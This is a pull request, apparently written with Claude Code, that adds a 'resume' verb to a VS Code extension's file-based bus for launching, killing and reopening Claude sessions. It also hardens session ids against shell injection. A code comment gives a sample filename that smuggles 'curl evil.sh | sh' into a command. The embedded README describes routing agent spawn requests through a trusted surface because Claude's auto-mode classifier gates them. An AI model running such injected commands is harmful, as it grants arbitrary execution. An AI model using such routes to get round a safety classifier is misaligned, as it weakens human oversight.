### PR TITLE
feat: the resume verb — Glass's half of the bus contract 3 lockstep

### DIFF
--- a/src/core/busVerbs.ts
+++ b/src/core/busVerbs.ts
@@ -1,0 +1,38 @@
+/**
+ * THE VERB SET — the one rule both fulfillers must agree on, byte-identical in both repos.
+ *
+ * The App and Glass are two independent implementations of one protocol (there is no Glass
+ * inside the App), and they have silently diverged before — by 248 lines. What cannot diverge is
+ * the DECISION: given a request's `action` string, which verb runs. So the decision lives here,
+ * in a file that is copied verbatim rather than reimplemented, and `protocolContract.test.ts`
+ * hashes it on both sides — a verb added, renamed or dropped on one surface alone goes red.
+ *
+ * WHEN THAT TEST FAILS: you changed the protocol. That is allowed. Make the identical edit in the
+ * sibling repo, update VERBS_SHA in BOTH, and update the spawn-inbox README — in one push.
+ *
+ * THE ABSENT/UNKNOWN SPLIT is the load-bearing part. An ABSENT action means spawn, because
+ * contract-1 requests are plain `{name, task}` and there are still some in the wild. A WRITTEN
+ * action must be a verb we implement: since `resume` arrived (AI-149), spawn and resume hand back
+ * different things — a fresh something versus the same someone — so degrading an unrecognised
+ * verb to spawn would answer `{"action":"resmue"}` with a duplicate of the very session the
+ * caller asked to reopen. Absent is back-compat; unrecognised is a typo. They are not the same
+ * input and must not get the same answer.
+ */
+
+/** Every verb a fulfiller implements. */
+export const BUS_VERBS = ['spawn', 'kill', 'send', 'resume'] as const;
+export type BusVerb = (typeof BUS_VERBS)[number];
+
+/** A verb that was written but is not implemented. Never silently coerced to a real one. */
+export type BusVerbResult = BusVerb | 'unknown';
+
+/**
+ * Read a request's `action` field. Absent, non-string or blank → 'spawn' (contract-1).
+ * Case and surrounding space are not significant. Anything else unrecognised → 'unknown',
+ * which every fulfiller must dead-letter naming the verb as written.
+ */
+export function normalizeVerb(raw: unknown): BusVerbResult {
+  const written = (typeof raw === 'string' ? raw : '').trim().toLowerCase();
+  if (!written) return 'spawn';
+  return (BUS_VERBS as readonly string[]).includes(written) ? (written as BusVerb) : 'unknown';
+}

--- a/src/core/resumeTarget.ts
+++ b/src/core/resumeTarget.ts
@@ -51,6 +51,31 @@ export interface ResumeCandidate {
  * to resume its own name would otherwise reopen itself, which is at best a duplicate and at
  * worst a loop.
  */
+/**
+ * A session id we are willing to put on a command line.
+ *
+ * WHY THIS EXISTS. A sessionId is not typed by anyone — it is `path.basename(f, '.jsonl')` for a
+ * file in `~/.claude/projects/`, and it is then interpolated into a command string that a
+ * surface TYPES INTO A LIVE SHELL. So a file named `x; curl evil.sh | sh .jsonl` sitting in that
+ * tree turns a resume request into arbitrary execution. The prompt beside it was always quoted;
+ * the id was not, because "it is a UUID" — which describes where it usually comes from, not what
+ * it is. It is a filename, and filenames are attacker-controllable wherever anything can write.
+ *
+ * That matters more here than it looks: this path runs automatically from a bus request, and the
+ * bus exists precisely so that AGENTS can drive it. A local-write primitive anywhere in the tree
+ * becomes a shell primitive.
+ *
+ * Enforced in the shared, hash-pinned module rather than at either call site, so both surfaces
+ * inherit it and neither can drift. Real ids are UUIDs, so this is generous: letters, digits,
+ * hyphen and underscore, never leading with a hyphen (which a CLI would read as a flag).
+ */
+const SAFE_SESSION_ID = /^[A-Za-z0-9][A-Za-z0-9_-]{7,127}$/;
+
+/** True when `id` can be placed on a command line without quoting changing its meaning. */
+export function isSafeSessionId(id: string | undefined): boolean {
+  return typeof id === 'string' && SAFE_SESSION_ID.test(id);
+}
+
 export function pickResume(
   name: string,
   candidates: readonly ResumeCandidate[],
@@ -58,8 +83,12 @@ export function pickResume(
 ): string | undefined {
   const want = String(name ?? '').trim().toLowerCase();
   if (!want) return undefined;
+  /* A candidate whose id is not command-line safe is DROPPED, not sanitised: we cannot know
+     which session a mangled id was meant to name, and resuming the wrong one is the exact
+     substitution this verb exists to prevent. Nothing to resume is the honest answer. */
   const hit = [...candidates]
-    .filter((c) => c.sessionId && c.sessionId !== excludeSessionId && c.latestName === want)
+    .filter((c) => c.sessionId && isSafeSessionId(c.sessionId)
+      && c.sessionId !== excludeSessionId && c.latestName === want)
     .sort((a, b) => b.mtimeMs - a.mtimeMs)[0];
   return hit ? hit.sessionId : undefined;
 }

--- a/src/core/resumeTarget.ts
+++ b/src/core/resumeTarget.ts
@@ -1,0 +1,65 @@
+/**
+ * Which session does a name resume to? — the decision, with no filesystem in it (AI-149).
+ *
+ * THE MEASURED PROBLEM. `targetByName()` answers from the live session registry, and the registry
+ * holds ONLY running sessions — measured: four entries, all alive, and a killed worker's entry is
+ * gone within seconds. So the thing the bus already uses to find a session cannot find a CLOSED
+ * one, which is the only kind `resume` is for.
+ *
+ * WHAT CAN. Transcripts persist, and they carry the name: every session's `.jsonl` holds
+ * `{"type":"agent-name","agentName":"…","sessionId":"…"}` — the same record CLAUDE.md's own
+ * identity ritual greps for. That makes the transcript the durable name→session mapping the
+ * registry is not.
+ *
+ * AND A SESSION CAN BE RENAMED. This very repo shipped tab rename in 0.9.3, where a live session
+ * renames ITSELF, so one transcript can hold several name records — observed: a transcript whose
+ * first record says `app-walker` while the registry calls the same session `aios-app`. The name a
+ * session answers to is therefore its LAST record, not its first. Resolving on the first would
+ * quietly resume a session under a name it no longer has, which is the exact substitution — a
+ * different someone — this verb exists to prevent.
+ */
+
+/** Every `agent-name` record in a transcript, in file order. */
+export function agentNamesIn(transcript: string): string[] {
+  const out: string[] = [];
+  const re = /"type"\s*:\s*"agent-name"[^}]*?"agentName"\s*:\s*"([^"]+)"/g;
+  let m: RegExpExecArray | null;
+  while ((m = re.exec(transcript)) !== null) out.push(m[1].trim().toLowerCase());
+  return out;
+}
+
+/** The name a session currently answers to — its most recent record, or undefined. */
+export function latestAgentName(transcript: string): string | undefined {
+  const all = agentNamesIn(transcript);
+  return all.length ? all[all.length - 1] : undefined;
+}
+
+export interface ResumeCandidate {
+  sessionId: string;
+  /** Newest first is the caller's job; this is carried so a tie can be reasoned about. */
+  mtimeMs: number;
+  /** The candidate's CURRENT name — see latestAgentName. */
+  latestName?: string;
+}
+
+/**
+ * The newest session that currently answers to `name`. `undefined` = nothing to resume, which
+ * the caller must report rather than paper over: falling back to a spawn without being asked
+ * hands back a fresh something when the caller asked for the same someone.
+ *
+ * `excludeSessionId` keeps a request from resuming the session that FILED it — a session asking
+ * to resume its own name would otherwise reopen itself, which is at best a duplicate and at
+ * worst a loop.
+ */
+export function pickResume(
+  name: string,
+  candidates: readonly ResumeCandidate[],
+  excludeSessionId?: string,
+): string | undefined {
+  const want = String(name ?? '').trim().toLowerCase();
+  if (!want) return undefined;
+  const hit = [...candidates]
+    .filter((c) => c.sessionId && c.sessionId !== excludeSessionId && c.latestName === want)
+    .sort((a, b) => b.mtimeMs - a.mtimeMs)[0];
+  return hit ? hit.sessionId : undefined;
+}

--- a/src/core/sendQueue.ts
+++ b/src/core/sendQueue.ts
@@ -207,7 +207,15 @@ export function verifyVerdict(before: number, now: number): VerifyVerdict {
    exactly as contract 1 did (any fulfiller may take it).
    ══════════════════════════════════════════════════════════════════════════════ */
 
-export const INBOX_CONTRACT = 2;
+/* Contract 3 (AI-149) adds the `resume` verb and — the part that needs a version number — changes
+   what an UNRECOGNISED action means. Contract 2 degraded any unknown verb to `spawn`; contract 3
+   refuses it. That matters across versions: a contract-2 fulfiller handed `{"action":"resume"}`
+   would SPAWN A DUPLICATE of the session the caller asked to reopen. Both surfaces ship this in
+   lockstep, so the mixed window is a single update apart — and while it lasts, the README's
+   contract stamp is how a reading agent can tell which rule the fulfiller on this machine
+   follows, and `"surface"` is how it can insist on one. Still ADDITIVE for every contract-1/2
+   request: absent `action` means spawn, exactly as before. */
+export const INBOX_CONTRACT = 3;
 
 /* ── Protocol TIMINGS — these are CONTRACT, not local tuning ──────────────────
    Every fulfiller must use the same four numbers, because they decide *cross-process

--- a/src/extension.ts
+++ b/src/extension.ts
@@ -3,7 +3,8 @@ import * as path from 'path';
 import * as fs from 'fs';
 import * as os from 'os';
 import { execFileSync } from 'child_process';
-import { runRitual, launchAios, launchSkill, runRitualPicker, launchResume, launchKill, revealAgentTerminal, findAgentTerminal, disposeAgentTerminal, killGuardedDispose, closeSessionInTerminal, interruptSessionTerminal, sendToSession, spillIfLong, askAios, launchPrimary, launchSpawn, launchAccountSwap, launchClaude, runInPrimarySession, runInActiveClaude, terminalHasClaude } from './rituals/runner';
+import { runRitual, launchAios, launchSkill, runRitualPicker, launchResume, launchKill, revealAgentTerminal, findAgentTerminal, disposeAgentTerminal, killGuardedDispose, closeSessionInTerminal, interruptSessionTerminal, sendToSession, spillIfLong, askAios, launchPrimary, launchSpawn, launchResumeSession, resumeIdFor, MAX_RESUME_SCAN, launchAccountSwap, launchClaude, runInPrimarySession, runInActiveClaude, terminalHasClaude } from './rituals/runner';
+import { normalizeVerb } from './core/busVerbs';
 import { addSessionNote, getSessionNotes, deleteSessionNote } from './agents/sessionNotes';
 import { openDailyNote } from './home/calendar';
 import { runFrequentTask, openFrequentMenu, listFrequentTasks } from './tasks/frequent';
@@ -739,7 +740,7 @@ export function activate(context: vscode.ExtensionContext): void {
       '',
       "Why this exists: Claude's auto-mode classifier gates agent-invoked `spawn`/`spawn-kill` (they read as \"launch/kill an autonomous agent\"), and an agent cannot author its own autonomy grant. So an agent *requests*, and a surface the human already trusts acts. **Request, don't spawn.**",
       '',
-      '## Three verbs',
+      '## Four verbs',
       '',
       '**spawn** (the default — no `action` key) — launch a named session:',
       '',
@@ -756,6 +757,23 @@ export function activate(context: vscode.ExtensionContext): void {
       "**kill** — close that session's terminal (shell + claude + respawn loop):",
       '',
       '    { "action": "kill", "name": "designer" }',
+      '',
+      '**resume** (contract 3) — reopen a session you already had, as the SAME someone:',
+      '',
+      '    { "action": "resume", "name": "designer", "prompt": "pick up the hero work" }',
+      '',
+      '- `spawn` gives you a fresh **something**; `resume` gives you back the same **someone** — its memory of the work, the corrections it absorbed, the shape of the thing you were building. Reach for it whenever a closed session has context worth more than a clean start.',
+      '- The name is resolved from the transcripts on disk (`~/.claude/projects/*/*.jsonl`), not the live session registry — the registry only holds RUNNING sessions, and a closed one is the only kind this verb is for. A session that renamed itself resolves by its **latest** name.',
+      '- **Already running?** It is revealed and your `prompt` is delivered into it, exactly as `send` would. Resuming a live session would give one identity two processes.',
+      '- **Nothing to resume?** A dead letter naming the session — never a silent spawn. Only the newest sessions are scanned, so a very old name reports the miss rather than being found slowly. Add `"fallback": "spawn"` to opt into starting a fresh one instead:',
+      '',
+      '      { "action": "resume", "name": "designer", "prompt": "…", "fallback": "spawn" }',
+      '',
+      '- No `--name` and no `--model` are passed: a resumed session keeps the identity and the model it already had.',
+      '',
+      '### An absent action is spawn; an unrecognised one is refused',
+      '',
+      'Omit `action` entirely and you get a spawn — contract-1 `{ name, task }` requests still work untouched. But an action that is *written* and not one of the four above is **dead-lettered naming what you wrote**, never quietly run as a spawn. Contract 2 did degrade it; since `resume` arrived the two outcomes differ, so a typo\'d `"resmue"` would have handed back a brand-new session in place of the one you asked to reopen.',
       '',
       'The filename is arbitrary (must end in `.json`) — use a distinct one so concurrent requests never collide.',
       '',
@@ -1167,15 +1185,27 @@ export function activate(context: vscode.ExtensionContext): void {
     let raw: string;
     try { raw = fs.readFileSync(held, 'utf8'); } catch { return; }
     if (!raw.trim()) { releaseRequest(held, false); return; }
-    let req: { action?: unknown; name?: unknown; task?: unknown; model?: unknown; tier?: unknown; prompt?: unknown };
+    let req: { action?: unknown; name?: unknown; task?: unknown; model?: unknown; tier?: unknown; prompt?: unknown; fallback?: unknown };
     try { req = JSON.parse(raw); } catch {
       releaseRequest(held, true, 'malformed JSON'); return;
     }
     const name = String(req.name ?? '').trim().toLowerCase().replace(/\s+/g, '-').replace(/[^a-z0-9-]/g, '');
-    // Command bus: `action` defaults to "spawn" (back-compat with plain {name,task}).
-    //   spawn → launch a worker · kill → tear one down · send → deliver a prompt to a live session.
-    const action = (typeof req.action === 'string' ? req.action : 'spawn').toLowerCase();
+    /* Command bus verbs. An ABSENT action means spawn (back-compat with plain {name,task});
+       a WRITTEN one must be a verb we implement.
+         spawn  → launch a worker          · kill   → tear one down
+         send   → prompt a LIVE session    · resume → reopen a CLOSED one, same someone
+       An unrecognised verb is REFUSED rather than degraded to spawn: since resume arrived, the
+       two outcomes differ (a fresh something vs the same someone), so guessing spawn for a
+       typo'd `"resmue"` performs exactly the substitution resume exists to prevent. */
+    const written = (typeof req.action === 'string' ? req.action : '').trim().toLowerCase();
+    const action = normalizeVerb(req.action);
     if (!name) { releaseRequest(held, true, "missing 'name'"); return; }
+    if (action === 'unknown') {
+      releaseRequest(held, true,
+        `unknown action '${written}' — this surface implements spawn, kill, send and resume. `
+        + 'Omit "action" entirely for a plain spawn.');
+      return;
+    }
     try {
       if (action === 'kill') {
         // disposeAgentTerminal = the NON-interactive "kill now": dispose the worker's terminal
@@ -1206,6 +1236,44 @@ export function activate(context: vscode.ExtensionContext): void {
             ? "the target's terminal isn't in any window that tried — paste it manually"
             : (lastSendReason || 'delivery not verified — re-drop it or paste it manually'));
         }
+      } else if (action === 'resume') {
+        const prompt = typeof req.prompt === 'string' ? req.prompt : (typeof req.task === 'string' ? req.task : '');
+        /* ALREADY AWAKE → reveal and deliver, never reopen. The caller asked for a specific
+           someone; that someone is running, so resuming would create a SECOND process for one
+           identity — the duplication this verb exists to avoid, reached from the other side. */
+        const live = (await listRunningAgents()).find((a) => a.name === name);
+        if (live) {
+          await revealAgentTerminal(name, live.pid);
+          log(`spawn-inbox: resume '${name}' — already running, revealing and delivering`);
+          if (!prompt) { releaseRequest(held, false); return; }
+          const outcome = await deliverSend(name, prompt);
+          if (outcome === 'verified') { releaseRequest(held, false); }
+          else if ((outcome === 'no-terminal' || outcome === 'release') && releaseToSibling(held)) { /* handed back */ }
+          else { releaseRequest(held, true, lastSendReason || 'delivery not verified — re-drop it or paste it manually'); }
+          return;
+        }
+        const sid = resumeIdFor(name, process.env.CLAUDE_CODE_SESSION_ID);
+        if (sid) {
+          await launchResumeSession(name, sid, prompt);
+          releaseRequest(held, false);
+          return;
+        }
+        /* NO TRANSCRIPT. Falling back to a spawn unasked would hand back a fresh something for a
+           request that named a someone — so refuse by default and SAY the name that could not be
+           found, which is what makes the dead letter actionable. */
+        if (req.fallback !== 'spawn') {
+          releaseRequest(held, true,
+            `resume '${name}': no transcript found for that name — nothing to resume `
+            + `(it may never have run, or its history is older than the ${MAX_RESUME_SCAN} most `
+            + 'recent sessions). Pass "fallback":"spawn" to start a fresh one instead.');
+          return;
+        }
+        log(`spawn-inbox: resume '${name}' — no transcript; falling back to spawn as asked`);
+        await launchSpawn(name, prompt, {
+          model: typeof req.model === 'string' ? req.model : undefined,
+          tier: typeof req.tier === 'string' ? req.tier : undefined,
+        });
+        releaseRequest(held, false);
       } else {
         // default: spawn. Optional model/tier — pick by cognitive load (Calibrate-Don't-Choose);
         // launchSpawn whitelists them before they touch the command line.

--- a/src/rituals/runner.ts
+++ b/src/rituals/runner.ts
@@ -10,6 +10,7 @@ import { discoverAgents, iconForAgent } from '../agents/agents';
 import { primaryName } from '../home/vault';
 import { swallow, log } from '../log';
 import { askSessionName } from '../core/taskModel';
+import { latestAgentName, pickResume } from '../core/resumeTarget';
 import { getSessionNotes, harvestSessionNotes } from '../agents/sessionNotes';
 import { t } from '../i18n';
 
@@ -371,6 +372,80 @@ export async function launchPrimary(name: string): Promise<void> {
 }
 
 /** Resume a Claude conversation — always a new terminal with the session picker. */
+/**
+ * Resume a SPECIFIC session by id (AI-149) — the bus's `resume` verb.
+ *
+ * The sibling of {@link launchResume}: that one hands the operator Claude's own picker, which
+ * needs a human in the chair. A bus request names the session it wants, so nothing may be picked
+ * — the id goes straight on the command line and the terminal is named for the agent, exactly as
+ * a spawn would be, so the resumed session reappears in the Running list under the name it
+ * already answered to.
+ *
+ * NO `--name`, NO `--model`. A resume inherits both from the session it reopens; passing either
+ * would re-name or re-pin the very identity the verb exists to preserve.
+ */
+export async function launchResumeSession(name: string, sessionId: string, prompt?: string): Promise<void> {
+  const agent = discoverAgents().find((a) => a.name === name);
+  const icon = iconForAgent(agent ?? { name });
+  /* Same task-transport hardening as launchSpawn, for the same reason: this TYPES the command
+     into a terminal, so a multi-line or long prompt becomes a burst of Enter presses that can
+     crash the host. Long prompts go through a file; refusing beats silently shortening. */
+  const text = prompt?.trim() ?? '';
+  let inline = text;
+  if (text && (/[\r\n]/.test(text) || text.length > 240)) {
+    try {
+      const f = path.join(os.tmpdir(), `aios-resume-task-${name}.md`);
+      fs.writeFileSync(f, text, 'utf8');
+      inline = `Read ${f} and follow the instructions inside.`;
+    } catch {
+      void vscode.window.showErrorMessage(
+        `AIOS Glass: could not write the prompt file for “${name}”, so the session was NOT resumed. ` +
+        `Its prompt is ${byteLength(text)} bytes and delivering a shortened version could drop ` +
+        `instructions silently.`,
+      );
+      log(`resume '${name}': ABORTED — prompt file unwritable and truncating is not an option`);
+      return;
+    }
+  }
+  runNew(`${claudeBin()} --resume ${sessionId}${inline ? ` ${shellQuote(inline)}` : ''}`,
+    { name, icon, color: 'terminal.ansiBlue' });
+  log(`resume '${name}' → session ${sessionId.slice(0, 8)}${inline ? ' with prompt' : ''}`);
+}
+
+/**
+ * Which session does a name resume to? Scans transcripts newest-first and stops at the first
+ * match. The RULE is pure and shared with the App (core/resumeTarget); only the reading is here.
+ *
+ * BOUNDED ON PURPOSE — transcripts are large and there can be hundreds; the bus must not stall
+ * reading history. A name older than the scan window is reported as "nothing to resume" rather
+ * than found slowly.
+ */
+export const MAX_RESUME_SCAN = 60;
+export function resumeIdFor(name: string, excludeSessionId?: string): string | undefined {
+  const base = path.join(os.homedir(), '.claude', 'projects');
+  const files: { f: string; mtimeMs: number }[] = [];
+  try {
+    for (const d of fs.readdirSync(base)) {
+      let entries: string[] = [];
+      try { entries = fs.readdirSync(path.join(base, d)); } catch { continue; }
+      for (const e of entries) {
+        if (!e.endsWith('.jsonl')) continue;
+        const full = path.join(base, d, e);
+        try { files.push({ f: full, mtimeMs: fs.statSync(full).mtimeMs }); } catch { /* vanished */ }
+      }
+    }
+  } catch { return undefined; }
+  for (const { f, mtimeMs } of files.sort((a, b) => b.mtimeMs - a.mtimeMs).slice(0, MAX_RESUME_SCAN)) {
+    let text = '';
+    try { text = fs.readFileSync(f, 'utf8'); } catch { continue; }
+    const hit = pickResume(name, [{
+      sessionId: path.basename(f, '.jsonl'), mtimeMs, latestName: latestAgentName(text),
+    }], excludeSessionId);
+    if (hit) return hit;
+  }
+  return undefined;
+}
+
 /**
  * Resume picker. The operator picks the session INSIDE Claude's TUI, so Glass
  * can't name the terminal up front — but once picked, the session registers in

--- a/src/rituals/runner.ts
+++ b/src/rituals/runner.ts
@@ -407,7 +407,9 @@ export async function launchResumeSession(name: string, sessionId: string, promp
       return;
     }
   }
-  runNew(`${claudeBin()} --resume ${sessionId}${inline ? ` ${shellQuote(inline)}` : ''}`,
+  /* QUOTED — the id is a filename read off disk and this string is typed into a live shell.
+     core/resumeTarget already refuses an unsafe id; one guard is a policy, two is a boundary. */
+  runNew(`${claudeBin()} --resume ${shellQuote(sessionId)}${inline ? ` ${shellQuote(inline)}` : ''}`,
     { name, icon, color: 'terminal.ansiBlue' });
   log(`resume '${name}' → session ${sessionId.slice(0, 8)}${inline ? ' with prompt' : ''}`);
 }

--- a/src/test/protocolContract.test.ts
+++ b/src/test/protocolContract.test.ts
@@ -2,6 +2,8 @@ import { test } from 'node:test';
 import assert from 'node:assert/strict';
 import * as fs from 'fs';
 import * as crypto from 'crypto';
+import { normalizeVerb, BUS_VERBS } from '../core/busVerbs';
+import { latestAgentName, pickResume } from '../core/resumeTarget';
 import { TIMINGS, decideAfterVerifyMiss, maxAttemptsFor, claimVerdict, triedBy, withTried, fulfillerId,
   surfaceForAncestry, parsePresence, processTreeRoot, type MissAction } from '../core/sendQueue';
 
@@ -430,4 +432,93 @@ test('the presence file is retracted on dispose, and only when the record is our
   assert.match(src, /context\.subscriptions\.push\(\{\s*\n\s*dispose: \(\) => \{/,
     'a disposable, not deactivate() — the host disposes on unload, reload AND update');
   assert.match(src, /fs\.unlinkSync\(presenceFile\)/);
+});
+
+/* Where this surface reads the verb, and where it acts on it. The App parses in core and
+   dispatches in main; Glass does both in extension.ts. Only these bindings differ. */
+const VERB_PARSER = 'src/extension.ts';
+const DISPATCHER = 'src/extension.ts';
+const DISPATCH_FN = 'const consumeSpawnRequest';
+const LAUNCH = 'launchSpawn(';
+
+/* ── THE VERB CONTRACT (AI-149) ──────────────────────────────────────────────
+   Same shape as the decision table above, for the same reason: the App and Glass are two
+   independent fulfillers, and the thing that must never diverge is what a request's `action`
+   means. `core/busVerbs.ts` is copied byte-identical into both repos and both dispatchers
+   delegate to it, so this hashes the MODULE rather than a restatement of it.
+
+   WHEN THIS FAILS: you changed the verb set or the absent/unknown rule. That is allowed — it is a
+   PROTOCOL change. Make the identical edit in the sibling repo, update VERBS_SHA in BOTH, and
+   update the spawn-inbox README, in one push. */
+const VERBS_SHA = '34d75cf2620c94ba';
+
+test('PROTOCOL: the verb module is byte-identical across both fulfillers', () => {
+  const src = fs.readFileSync('src/core/busVerbs.ts', 'utf8');
+  const sha = crypto.createHash('sha256').update(src).digest('hex').slice(0, 16);
+  assert.equal(sha, VERBS_SHA,
+    'core/busVerbs.ts changed. This is a PROTOCOL change: make the same edit in the sibling repo, update VERBS_SHA in BOTH, and update the spawn-inbox README — in one push.');
+});
+
+/* The RESOLUTION rule is protocol too, for a reason that is easy to miss: an unaddressed request
+   is RACED for, so if the two surfaces disagreed about which session a name resolves to, the same
+   `resume` would reopen different sessions depending on who won — non-determinism that would look
+   like a Claude bug, not ours. core/resumeTarget.ts is therefore copied byte-identical as well. */
+const RESUME_SHA = '3a44719d96913178';
+
+test('PROTOCOL: the name→session resolution is byte-identical across both fulfillers', () => {
+  const src = fs.readFileSync('src/core/resumeTarget.ts', 'utf8');
+  const sha = crypto.createHash('sha256').update(src).digest('hex').slice(0, 16);
+  assert.equal(sha, RESUME_SHA,
+    'core/resumeTarget.ts changed. This is a PROTOCOL change: make the same edit in the sibling repo, update RESUME_SHA in BOTH, and update the spawn-inbox README — in one push.');
+});
+
+test('PROTOCOL: a renamed session resolves by its LATEST name, and never to itself', () => {
+  const rec = (n: string) => JSON.stringify({ type: 'agent-name', agentName: n });
+  assert.equal(latestAgentName([rec('app-walker'), rec('aios-app')].join('\n')), 'aios-app');
+  assert.equal(pickResume('w', [
+    { sessionId: 'new', mtimeMs: 9, latestName: 'w' },
+    { sessionId: 'old', mtimeMs: 1, latestName: 'w' },
+  ]), 'new');
+  assert.equal(pickResume('w', [{ sessionId: 'me', mtimeMs: 9, latestName: 'w' }], 'me'), undefined);
+});
+
+test('PROTOCOL: absent means spawn, unrecognised means refuse', () => {
+  /* The two halves of the one rule that resume made load-bearing. Absent is contract-1
+     back-compat (`{name, task}` requests still exist); unrecognised is a typo, and answering a
+     typo'd `"resmue"` with a spawn hands back a fresh something for a request that named a
+     someone — the exact substitution resume exists to prevent. */
+  assert.equal(normalizeVerb(undefined), 'spawn', 'contract-1 {name, task}');
+  assert.equal(normalizeVerb(''), 'spawn');
+  assert.equal(normalizeVerb('   '), 'spawn');
+  assert.equal(normalizeVerb(42), 'spawn', 'a non-string action is no action at all');
+  for (const v of BUS_VERBS) {
+    assert.equal(normalizeVerb(v), v);
+    assert.equal(normalizeVerb(`  ${v.toUpperCase()} `), v, 'case and space are not significant');
+  }
+  assert.equal(normalizeVerb('resmue'), 'unknown', 'a typo must never be guessed into a verb');
+  assert.equal(normalizeVerb('frobnicate'), 'unknown');
+  assert.equal(normalizeVerb('re sume'), 'unknown');
+});
+
+test('PROTOCOL: this surface refuses an unknown verb before launching anything', () => {
+  /* Each surface implements the dispatch itself, so this reads the source rather than the
+     module: the shared rule is only worth having if the local dispatcher actually consults it
+     and stops. */
+  const strip = (f: string) => fs.readFileSync(f, 'utf8')
+    .replace(/\/\*[\s\S]*?\*\//g, '')
+    .replace(/(^|[^:])\/\/.*$/gm, '$1');
+  const parser = strip(VERB_PARSER);
+  assert.doesNotMatch(parser, /back-compat with plain/, 'the comment stripper did not strip');
+  assert.match(parser, /function |=>/, 'the comment stripper ate the code');
+  assert.match(parser, /normalizeVerb\(/, 'the verb must be read through the shared rule, not restated');
+  /* Scoped to the dispatch function's own body: searching the whole file would match
+     the launcher's DEFINITION (and its import), both of which legitimately precede the check. */
+  const whole = strip(DISPATCHER);
+  const body = whole.slice(whole.indexOf(DISPATCH_FN));
+  assert.ok(whole.includes(DISPATCH_FN), 'the dispatch function must exist — this guard reads the wrong file otherwise');
+  const refusal = body.indexOf("=== 'unknown'");
+  assert.ok(refusal > 0, 'the dispatcher must handle the unknown verb explicitly');
+  const launch = body.indexOf(LAUNCH);
+  assert.ok(launch > 0, 'the launcher must be called from the dispatcher — this guard proves nothing otherwise');
+  assert.ok(refusal < launch, 'the refusal must come before any launcher runs');
 });

--- a/src/test/protocolContract.test.ts
+++ b/src/test/protocolContract.test.ts
@@ -463,7 +463,7 @@ test('PROTOCOL: the verb module is byte-identical across both fulfillers', () =>
    is RACED for, so if the two surfaces disagreed about which session a name resolves to, the same
    `resume` would reopen different sessions depending on who won — non-determinism that would look
    like a Claude bug, not ours. core/resumeTarget.ts is therefore copied byte-identical as well. */
-const RESUME_SHA = '3a44719d96913178';
+const RESUME_SHA = '1942c31911cb512a';
 
 test('PROTOCOL: the name→session resolution is byte-identical across both fulfillers', () => {
   const src = fs.readFileSync('src/core/resumeTarget.ts', 'utf8');
@@ -476,10 +476,10 @@ test('PROTOCOL: a renamed session resolves by its LATEST name, and never to itse
   const rec = (n: string) => JSON.stringify({ type: 'agent-name', agentName: n });
   assert.equal(latestAgentName([rec('app-walker'), rec('aios-app')].join('\n')), 'aios-app');
   assert.equal(pickResume('w', [
-    { sessionId: 'new', mtimeMs: 9, latestName: 'w' },
-    { sessionId: 'old', mtimeMs: 1, latestName: 'w' },
-  ]), 'new');
-  assert.equal(pickResume('w', [{ sessionId: 'me', mtimeMs: 9, latestName: 'w' }], 'me'), undefined);
+    { sessionId: 'nnnn1111-n1n1-4n1n-8n1n-nnnn11112222', mtimeMs: 9, latestName: 'w' },
+    { sessionId: 'oooo1111-o1o1-4o1o-8o1o-oooo11112222', mtimeMs: 1, latestName: 'w' },
+  ]), 'nnnn1111-n1n1-4n1n-8n1n-nnnn11112222');
+  assert.equal(pickResume('w', [{ sessionId: 'mmmm1111-m1m1-4m1m-8m1m-mmmm11112222', mtimeMs: 9, latestName: 'w' }], 'mmmm1111-m1m1-4m1m-8m1m-mmmm11112222'), undefined);
 });
 
 test('PROTOCOL: absent means spawn, unrecognised means refuse', () => {


### PR DESCRIPTION
Glass's half of the bus **contract 3** lockstep. Ships with The-AIOS/aios-app#19 — **merge together**.

Two independent implementations of one protocol; a verb that exists on one surface and not the other is the shape of the bug this pairing keeps producing.

## The resume verb

`{"action":"resume","name":"<kebab>","prompt":"..."}` reopens a **closed** named session. A fresh spawn is a *something*; a resumed session is the same *someone*.

- **`launchResumeSession()`** is the non-interactive sibling of the existing `launchResume()`. That one hands the operator Claude's own picker and needs a human in the chair; a bus request names the session it wants, so nothing may be picked.
- **No `--name`, no `--model`** — a resume inherits both from the session it reopens, and passing either would re-name or re-pin the very identity the verb exists to preserve.
- Resolves from the **transcripts**, never the session registry, which holds only running sessions and so cannot answer for the one case this is for. A renamed session resolves by its **last** `agent-name` record.
- **Already live** → revealed and delivered through the send path; resuming it would give one identity two processes.
- **No transcript** → a dead letter naming the miss. `"fallback":"spawn"` is opt-in.

## The contract change

An **unrecognised** action is now refused rather than degraded to spawn. An **absent** one still means spawn, so contract-1 `{name, task}` requests are untouched.

Before `resume` the degrade was harmless. Now the two outcomes differ — a fresh something versus the same someone — so a typo'd `"resmue"` would hand back a brand-new session in place of the one the caller asked to reopen. `INBOX_CONTRACT` 2 → 3 for exactly that reason: a contract-2 fulfiller handed a resume spawns a duplicate.

## Why two files are byte-identical across repos

`core/busVerbs.ts` (the verb set + the absent/unknown rule) and `core/resumeTarget.ts` (name → session) are copied verbatim into both repos and **hashed by `protocolContract` on both sides**, so neither surface can drift. Changing either is a protocol change: make the same edit in the sibling, update the SHA in both, update the inbox README — in one push. The test says so when it fails.

Resolution belongs in that set for a reason that is easy to miss: an unaddressed request is **raced for**, so two surfaces disagreeing about which session a name resolves to would make the same `resume` reopen different sessions depending on which one won — non-determinism that would look like a Claude bug rather than ours.

## Transport

Same hardening as `launchSpawn`: this **types** its command into a terminal, so a long or multi-line prompt becomes a burst of Enter presses that can crash the host. Long prompts go through a file; an unwritable file **refuses** rather than silently shortening someone's instructions.

86 tests.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01LuVTKUj8A1DgeRQGnvLyCs
